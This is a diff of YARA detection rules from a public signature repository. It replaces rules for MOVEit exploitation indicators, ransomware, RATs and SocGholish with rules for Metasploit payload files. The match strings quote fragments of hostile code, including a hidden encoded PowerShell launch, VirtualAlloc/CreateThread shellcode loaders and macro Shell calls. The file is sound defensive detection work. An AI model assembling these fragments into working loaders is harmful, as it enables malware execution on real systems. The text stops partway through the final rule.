+		id = "5b760f03-b0f8-5871-bd34-e7e44443530c"
+		date = "2017-02-09"
 		modified = "2023-12-05"
-		reference = "https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_moveit_0day_jun23.yar#L24-L41"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L42-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "436f9a503ad938541faa8f34604310ba6d932e40a41dc189ccd293b7191a7621"
-		score = 85
+		logic_hash = "2e6015e8c91ccd8647e78220d10c2d704867369d962b734bb4522a1213be2f2d"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "2413b5d0750c23b07999ec33a5b4930be224b661aaf290a0118db803f31acbc5"
-		hash2 = "48367d94ccb4411f15d7ef9c455c92125f3ad812f2363c4d2e949ce1b615429a"
-		hash3 = "e8012a15b6f6b404a33f293205b602ece486d01337b8b3ec331cd99ccadb562e"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f"
 
 	strings:
-		$s1 = "X-siLock-Comment" ascii fullword
-		$s2 = "]; string x = null;" ascii
-		$s3 = ";  if (!String.Equals(pass, " ascii
+		$s1 = "powershell.exe -nop -w hidden -e" ascii
+		$s2 = "Call Shell(" ascii
+		$s3 = "Sub Workbook_Open()" fullword ascii
 
 	condition:
-		filesize < 150KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_LOG_EXPL_Moveit_Exploitation_Indicator_Jun23_1
+rule SIGNATURE_BASE_Msfpayloads_Msf_Exe
 {
 	meta:
-		description = "Detects a potential compromise indicator found in MOVEit Transfer logs"
-		author = "Florian Roth"
-		id = "a7c521b8-c654-51dd-9d5b-4ba883feffe3"
-		date = "2023-06-01"
+		description = "Metasploit Payloads - file msf-exe.vba"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fd07240e-0ee0-5318-a436-d97054e92414"
+		date = "2017-02-09"
 		modified = "2023-12-05"
-		reference = "https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_moveit_0day_jun23.yar#L43-L56"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L59-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "26674d8dea5cb2e95e442c4c75d80ca610f7373f0b216c0b1c83a5b1f9f70316"
-		score = 70
+		logic_hash = "3baa242e90dd845e022785101ebc2d5c0d84007d20aef6a2bb6a9a8c6280d4eb"
+		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "321537007ea5052a43ffa46a6976075cee6a4902af0c98b9fd711b9f572c20fd"
 
 	strings:
-		$x1 = "POST /moveitisapi/moveitisapi.dll action=m2 " ascii
-		$x2 = " GET /human2.aspx - 443 " ascii
+		$s1 = "'* PAYLOAD DATA" fullword ascii
+		$s2 = " = Shell(" ascii
+		$s3 = "= Environ(\"USERPROFILE\")" fullword ascii
+		$s4 = "'**************************************************************" fullword ascii
+		$s5 = "ChDir (" ascii
+		$s6 = "'* MACRO CODE" fullword ascii
 
 	condition:
-		1 of them
+		4 of them
 }
-rule SIGNATURE_BASE_LOG_EXPL_Moveit_Exploitation_Indicator_Jun23_2
+rule SIGNATURE_BASE_Msfpayloads_Msf_3
 {
 	meta:
-		description = "Detects a potential compromise indicator found in MOVEit Transfer logs"
-		author = "Florian Roth"
-		id = "1527f5e3-071d-5152-9452-9c4472d258f2"
-		date = "2023-06-03"
+		description = "Metasploit Payloads - file msf.psh"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ad09167f-a12a-5f07-940b-df679fa8e6c0"
+		date = "2017-02-09"
 		modified = "2023-12-05"
-		reference = "https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_moveit_0day_jun23.yar#L58-L79"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L79-L102"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "56328d078801a702ad47f01f356df6f00be8da593d03c549e77312af9b47b5be"
-		score = 70
-		quality = 85
+		logic_hash = "d1aeb97c19365f996dc1bc0fd6e01342878967be25d3e042158eba986af28b4a"
+		score = 75
+		quality = 83
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "335cfb85e11e7fb20cddc87e743b9e777dc4ab4e18a39c2a2da1aa61efdbd054"
 
 	strings:
-		$a1 = "Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.5195.102+Safari/537.36" ascii
-		$a2 = "Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.5195.54+Safari/537.36" ascii
-		$s1 = " POST /moveitisapi/moveitisapi.dll" ascii
-		$s2 = " POST /guestaccess.aspx"
-		$s3 = " POST /api/v1/folders/"
-		$s4 = "/files uploadType=resumable&"
-		$s5 = " action=m2 "
+		$s1 = "[DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject(" ascii
+		$s2 = "public enum MemoryProtection { ExecuteReadWrite = 0x40 }" fullword ascii
+		$s3 = ".func]::VirtualAlloc(0,"
+		$s4 = ".func+AllocationType]::Reserve -bOr [" ascii
+		$s5 = "New-Object System.CodeDom.Compiler.CompilerParameters" fullword ascii
+		$s6 = "ReferencedAssemblies.AddRange(@(\"System.dll\", [PsObject].Assembly.Location))" fullword ascii
+		$s7 = "public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }" fullword ascii
+		$s8 = ".func]::CreateThread(0,0,$" fullword ascii
+		$s9 = "public enum Time : uint { Infinite = 0xFFFFFFFF }" fullword ascii
+		$s10 = "= [System.Convert]::FromBase64String(\"/" ascii
+		$s11 = "{ $global:result = 3; return }" fullword ascii
 
 	condition:
-		1 of ( $a* ) and 3 of ( $s* ) or all of ( $s* )
+		4 of them
 }
-rule SIGNATURE_BASE_LOG_EXPL_Moveit_Exploitation_Indicator_Jun23_3
+rule SIGNATURE_BASE_Msfpayloads_Msf_4
 {
 	meta:
-		description = "Detects a potential compromise indicator found in MOVEit DMZ Web API logs"
-		author = "Nasreddine Bencherchali"
-		id = "113a501f-d9ed-51fd-82cd-ccb6f02833bd"
-		date = "2023-06-13"
+		description = "Metasploit Payloads - file msf.aspx"
+		author = "Florian Roth (Nextron Systems)"
+		id = "00d7681b-6041-5fe1-adbb-8b7c40df0193"
+		date = "2017-02-09"
 		modified = "2023-12-05"
-		reference = "https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_moveit_0day_jun23.yar#L81-L94"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L104-L121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2eaa06c31687c6368f036a705fdc1b1c42355f19c098ae764a998039cc4aebb5"
-		score = 70
+		logic_hash = "8e84ef13aa72c7c35520b3534b908c7d00240915ab02f8216a2cef6440c322a2"
+		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "26b3e572ba1574164b76c6d5213ab02e4170168ae2bcd2f477f246d37dbe84ef"
 
 	strings:
-		$s1 = "TargetInvocationException" ascii
-		$s2 = "MOVEit.DMZ.Application.Folders.ResumableUploadFilePartHandler.DeserializeFileUploadStream" ascii
+		$s1 = "= VirtualAlloc(IntPtr.Zero,(UIntPtr)" ascii
+		$s2 = ".Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);" ascii
+		$s3 = "[System.Runtime.InteropServices.DllImport(\"kernel32\")]" fullword ascii
+		$s4 = "private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;" fullword ascii
+		$s5 = "private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);" fullword ascii
 
 	condition:
-		all of ( $s* )
+		4 of them
 }
-rule SIGNATURE_BASE_MAL_WIN_Ralordv1_Apr25 : FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_Exe_2
 {
 	meta:
-		description = "This ISH Tecnologia Yara rule, detects the main components of the first version of RALord Ransomware"
-		author = "0x0d4y-Icaro Cesar"
-		id = "67254633-3597-4770-9806-8b2e26c8f66a"
-		date = "2025-04-01"
-		modified = "2025-04-18"
-		reference = "https://ish.com.br/wp-content/uploads/2025/04/RALord-Novo-grupo-de-Ransomware-as-a-Service-1.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ralordv1_win_ap25.yar#L1-L29"
+		description = "Metasploit Payloads - file msf-exe.aspx"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a55a33e1-8f04-5417-af0c-b7e2da36fb46"
+		date = "2017-02-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L123-L139"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "be15f62d14d1cbe2aecce8396f4c6289"
-		logic_hash = "75d20cca5eb48109bbb3b0ab0ce2efb4f2d89bc1984df8c4fddf1f859d069750"
-		score = 80
-		quality = 85
-		tags = "FILE"
+		logic_hash = "bd82f496ade1a62e0aee8c8c90cee84377cb90adf11c87652082e74c8c85e568"
+		score = 75
+		quality = 83
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		rule_matching_tlp = "TLP:WHITE"
-		rule_sharing_tlp = "TLP:WHITE"
-		malpedia_family = "win.ralord"
+		hash1 = "3a2f7a654c1100e64d8d3b4cd39165fba3b101bbcce6dd0f70dae863da338401"
 
 	strings:
-		$code_pattern_quarterround = { 4? 31 ?? 48 8b ?? ?? ?? 4? 31 ?? 48 8b ?? ?? ?? 31 e8 4? 31 ?? 41 c1 ?? 0c c1 ?? 0c c1 ?? 0c 48 89 c2 c1 ?? 0c }
-		$code_pattern_custom_alg = { 0f 57 ?? 0f 10 ?? c5 ?? ?? ?? ?? 0f 57 ?? 0f 10 ?? c5 ?? ?? ?? ?? 0f 57 ?? 0f 10 ?? c5 ?? ?? ?? ?? 0f 57 ?? 0f 11 ?? c5 ?? ?? ?? ?? 0f 11 ?? c5 ?? ?? ?? ?? 0f 11 ?? c5 ?? ?? ?? ?? 0f 11 ?? c5 ?? ?? ?? ?? 48 83 c0 08 48 3d 8? }
-		$ralord_str_I = "chacha" ascii
-		$ralord_str_II = "scorp" ascii
-		$ralord_str_III = "RALord" ascii
-		$ralord_str_IV = "onion" ascii
-		$ralord_str_V = "/rust" ascii
-		$ralord_str_VI = "BCryptGenRandom" ascii
+		$x1 = "= new System.Diagnostics.Process();" fullword ascii
+		$x2 = ".StartInfo.UseShellExecute = true;" fullword ascii
+		$x3 = ", \"svchost.exe\");" ascii
+		$s4 = " = Path.GetTempPath();" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $code_pattern_* ) and 4 of ( $ralord_str_* )
+		all of them
 }
-rule SIGNATURE_BASE_Quasar_RAT_Jan18_1 : FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_5
 {
 	meta:
-		description = "Detects Quasar RAT"
+		description = "Metasploit Payloads - file msf.msi"
 		author = "Florian Roth (Nextron Systems)"
-		id = "52408897-bfec-5726-9d01-6ff982d50c28"
-		date = "2018-01-29"
+		id = "030d1982-c9a8-539d-a995-7901ae425857"
+		date = "2017-02-09"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_quasar_vermin.yar#L11-L33"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L141-L156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4b2c8695a053a714e97f3e108f0f359d9e49151297a21e460b3201d8f4e72a89"
+		logic_hash = "cb602670329391b091f87818a0f5defaa8f688f7921978510739b96ca63a2f12"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6"
-		hash2 = "24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18"
+		hash1 = "7a6c66dfc998bf5838993e40026e1f400acd018bde8d4c01ef2e2e8fba507065"
 
 	strings:
-		$a1 = "ping -n 20 localhost > nul" fullword wide
-		$s2 = "HandleDownloadAndExecuteCommand" fullword ascii
-		$s3 = "DownloadAndExecute" fullword ascii
-		$s4 = "UploadAndExecute" fullword ascii
-		$s5 = "ShellCommandResponse" fullword ascii
-		$s6 = "Select * From Win32_ComputerSystem" fullword wide
-		$s7 = "Process could not be started!" fullword wide
-		$s8 = ".Core.RemoteShell" ascii
+		$s1 = "required to install Foobar 1.0." fullword ascii
+		$s2 = "Copyright 2009 The Apache Software Foundation." fullword wide
+		$s3 = "{50F36D89-59A8-4A40-9689-8792029113AC}" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and $a1 and 3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Vermin_Keylogger_Jan18_1 : FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_6
 {
 	meta:
-		description = "Detects Vermin Keylogger"
+		description = "Metasploit Payloads - file msf.vbs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "52192ea1-bb3d-52da-ba18-0645262745e2"
-		date = "2018-01-29"
+		id = "5485102b-e709-5111-814a-e6878b4bd889"
+		date = "2017-02-09"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_quasar_vermin.yar#L35-L71"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L158-L177"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a8afe017f32400e1e498d23746f5cb59c3c67f6abefe9b2e36bec81ca82ecfed"
+		logic_hash = "b9498828a55477049922e50329d0c38ee34b8484562113a2686669ccbb8b3318"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d"
-		hash2 = "e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7"
-		hash3 = "0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6"
-		hash4 = "4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da"
-		hash5 = "24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18"
-		hash6 = "2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef"
+		hash1 = "8d6f55c6715c4a2023087c3d0d7abfa21e31a629393e4dc179d31bb25b166b3f"
 
 	strings:
-		$x1 = "_keyloggerTaskDescription" ascii
-		$x2 = "_keyloggerTaskAuthor" ascii
-		$x3 = "GetKeyloggerLogsResponse" fullword ascii
-		$x4 = "GetKeyloggerLogs" fullword ascii
-		$x5 = "ExecuteUninstallKeyLoggerTask" fullword ascii
-		$x6 = "ExecuteInstallKeyLoggerTask" fullword ascii
-		$x7 = ":\\Projects\\Vermin\\KeyboardHookLib\\" ascii
-		$x8 = ":\\Projects\\Vermin\\CryptoLib\\" ascii
-		$s1 = "<RunHidden>k__BackingField" fullword ascii
-		$s2 = "set_SystemInfos" fullword ascii
-		$s3 = "set_RunHidden" fullword ascii
-		$s4 = "set_RemotePath" fullword ascii
-		$s5 = "ExecuteShellCommandTask" fullword ascii
-		$s6 = "Client.exe" fullword wide
-		$s7 = "xClient.Core.ReverseProxy.Packets" fullword ascii
+		$s1 = "= CreateObject(\"Wscript.Shell\")" fullword ascii
+		$s2 = "= CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+		$s3 = ".GetSpecialFolder(2)" ascii
+		$s4 = ".Write Chr(CLng(\"" ascii
+		$s5 = "= \"4d5a90000300000004000000ffff00" ascii
+		$s6 = "For i = 1 to Len(" ascii
+		$s7 = ") Step 2" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( 1 of ( $x* ) or 3 of them )
+		5 of them
 }
-rule SIGNATURE_BASE_MAL_ZIP_Socgholish_Mar21_1 : ZIP JS SOCGHOLISH FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_7
 {
 	meta:
-		description = "Triggers on small zip files with typical SocGholish JS files in it"
-		author = "Nils Kuhnert"
-		id = "da35eefd-b34d-59cd-8afc-da9c78ace96e"
-		date = "2021-03-29"
+		description = "Metasploit Payloads - file msf.vba"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8d1b742e-510a-5807-ad3f-f10cc325d292"
+		date = "2017-02-09"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_socgholish.yar#L1-L22"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L179-L194"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4f6566c145be5046b6be6a43c64d0acae38cada5eb49b2f73135b3ac3d6ba770"
-		hash = "54f756fbf8c20c76af7c9f538ff861690800c622d1c9db26eb3afedc50835b09"
-		hash = "dfdbec1846b74238ba3cfb8c7580c64a0fa8b14b6ed2b0e0e951cc6a9202dd8d"
-		logic_hash = "6621b029f65720e468bd167fcd7429a1f7ba8975298ddbd913b13fbe9e117df2"
+		logic_hash = "167d295de5ffc9c88cf72f086fef4514f08cc3b9dd2d93b3ec36acffd6430370"
 		score = 75
-		quality = 35
-		tags = "ZIP, JS, SOCGHOLISH, FILE"
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "425beff61a01e2f60773be3fcb74bdfc7c66099fe40b9209745029b3c19b5f2f"
 
 	strings:
-		$a1 = /\.[a-z0-9]{6}\.js/ ascii
-		$a2 = "Chrome" ascii
-		$a3 = "Opera" ascii
-		$b1 = "Firefox.js" ascii
-		$b2 = "Edge.js" ascii
+		$s1 = "Private Declare PtrSafe Function CreateThread Lib \"kernel32\" (ByVal" ascii
+		$s2 = "= VirtualAlloc(0, UBound(Tsw), &H1000, &H40)" fullword ascii
+		$s3 = "= RtlMoveMemory(" ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 1600 and ( 2 of ( $a* ) or any of ( $b* ) )
+		all of them
 }
-rule SIGNATURE_BASE_EXT_MAL_JS_Socgholish_Mar21_1 : JS SOCGHOLISH FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_8
 {
 	meta:
-		description = "Triggers on SocGholish JS files"
-		author = "Nils Kuhnert"
-		id = "3ed7d2da-569b-5851-a821-4a3cda3e13ce"
-		date = "2021-03-29"
-		modified = "2023-01-02"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_socgholish.yar#L25-L51"
+		description = "Metasploit Payloads - file msf.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "54466663-12ef-5fa4-a13c-e80ddbc0f4f8"
+		date = "2017-02-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L196-L215"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7ccbdcde5a9b30f8b2b866a5ca173063dec7bc92034e7cf10e3eebff017f3c23"
-		hash = "f6d738baea6802cbbb3ae63b39bf65fbd641a1f0d2f0c819a8c56f677b97bed1"
-		hash = "c7372ffaf831ad963c0a9348beeaadb5e814ceeb878a0cc7709473343d63a51c"
-		logic_hash = "08218ae952577a6ac936de875236cdc3ae32e3aaccd2196b7f43e80d7e748584"
+		logic_hash = "d2b26276843cdfef2d1458ee6c3e2ecea962d1cd42bc21b86ebd03599bebcbc6"
 		score = 75
 		quality = 85
-		tags = "JS, SOCGHOLISH, FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "519717e01f0cb3f460ef88cd70c3de8c7f00fb7c564260bd2908e97d11fde87f"
 
 	strings:
-		$s1 = "new ActiveXObject('Scripting.FileSystemObject');" ascii
-		$s2 = "['DeleteFile']" ascii
-		$s3 = "['WScript']['ScriptFullName']" ascii
-		$s4 = "['WScript']['Sleep'](1000)" ascii
-		$s5 = "new ActiveXObject('MSXML2.XMLHTTP')" ascii
-		$s6 = "this['eval']" ascii
-		$s7 = "String['fromCharCode']"
-		$s8 = "2), 16)," ascii
-		$s9 = "= 103," ascii
-		$s10 = "'00000000'" ascii
+		$s1 = "[DllImport(\"kernel32.dll\")]" fullword ascii
+		$s2 = "[DllImport(\"msvcrt.dll\")]" fullword ascii
+		$s3 = "-Name \"Win32\" -namespace Win32Functions -passthru" fullword ascii
+		$s4 = "::VirtualAlloc(0,[Math]::Max($" ascii
+		$s5 = ".Length,0x1000),0x3000,0x40)" ascii
+		$s6 = "public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);" fullword ascii
+		$s7 = "::memset([IntPtr]($" ascii
 
 	condition:
-		filesize > 3KB and filesize < 5KB and 8 of ( $s* )
+		6 of them
 }
-rule SIGNATURE_BASE_Socgholish_JS_22_02_2022 : FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_Cmd
 {
 	meta:
-		description = "Detects SocGholish fake update Javascript files 22.02.2022"
-		author = "Wojciech Cieślak"
-		id = "68d2dbb7-0079-527a-92c7-450c3dd953b3"
-		date = "2022-02-22"
+		description = "Metasploit Payloads - file msf-cmd.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "71d42c34-a0b0-5173-8f2f-f48a7af0e4ff"
+		date = "2017-02-09"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_socgholish.yar#L53-L72"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L217-L230"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3e14d04da9cc38f371961f6115f37c30"
-		hash = "dffa20158dcc110366f939bd137515c3"
-		hash = "afee3af324951b1840c789540d5c8bff"
-		hash = "c04a1625efec27fb6bbef9c66ca8372b"
-		hash = "d08a2350df5abbd8fd530cff8339373e"
-		logic_hash = "fd529cbb511ff6bcf37b44b835e021b28763922f7726ff67db5cbb3f9193c7ae"
+		logic_hash = "ea44b3d00733eb7d4f924ccaece5265fcd90a462acb954a134b5355ecb0621e5"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9f41932afc9b6b4938ee7a2559067f4df34a5c8eae73558a3959dd677cb5867f"
 
 	strings:
-		$s1 = "encodeURIComponent(''+" ascii
-		$s2 = "['open']('POST'," ascii
-		$s3 = "new ActiveXObject('MSXML2.XMLHTTP');" ascii
+		$x1 = "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e" ascii
 
 	condition:
-		filesize < 5KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Projectm_Darkcomet_1 : FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_9 : FILE
 {
 	meta:
-		description = "Detects ProjectM Malware"
+		description = "Metasploit Payloads - file msf.war - contents"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6de74d73-f9b2-5e7f-b15e-f850425d849c"
-		date = "2016-03-26"
-		modified = "2023-01-27"
-		reference = "http://researchcenter.paloaltonetworks.com/2016/03/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_m.yar#L10-L30"
+		id = "488a2e97-ebc2-5ccf-ab5d-dfed4b534b52"
+		date = "2017-02-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L232-L252"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cc488690ce442e9f98bac651218f4075ca36c355d8cd83f7a9f5230970d24157"
-		logic_hash = "81ffaa382bb6f817fe2917a096a3eee49d2e8c281271da551ccd65679692712f"
+		logic_hash = "b5761b51b79f83c48deafaf3786cb90ef493ab0448cd67b86655cecb0160a627"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81"
 
 	strings:
-		$x1 = "DarkO\\_2" fullword ascii
-		$a1 = "AVICAP32.DLL" fullword ascii
-		$a2 = "IDispatch4" fullword ascii
-		$a3 = "FLOOD/" fullword ascii
-		$a4 = "T<-/HTTP://" ascii
-		$a5 = "infoes" fullword ascii
+		$s1 = "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1)" fullword ascii
+		$s2 = ".concat(\".exe\");" fullword ascii
+		$s3 = "[0] = \"chmod\";" ascii
+		$s4 = "= Runtime.getRuntime().exec(" ascii
+		$s5 = ", 16) & 0xff;" ascii
+		$x1 = "4d5a9000030000000" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 4 of them ) or ( all of them )
+		4 of ( $s* ) or ( uint32( 0 ) == 0x61356434 and $x1 at 0 )
 }
-rule SIGNATURE_BASE_Projectm_Crimsondownloader : FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_10 : FILE
 {
 	meta:
-		description = "Detects ProjectM Malware"
+		description = "Metasploit Payloads - file msf.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2e0658c9-a93d-5eef-93a2-eb1ab29acaee"
-		date = "2016-03-26"
+		id = "3bc3b66a-9f8a-55c2-ae2a-00faa778cef7"
+		date = "2017-02-09"
 		modified = "2023-12-05"
-		reference = "http://researchcenter.paloaltonetworks.com/2016/03/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_m.yar#L32-L51"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L254-L269"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "dc8bd60695070152c94cbeb5f61eca6e4309b8966f1aa9fdc2dd0ab754ad3e4c"
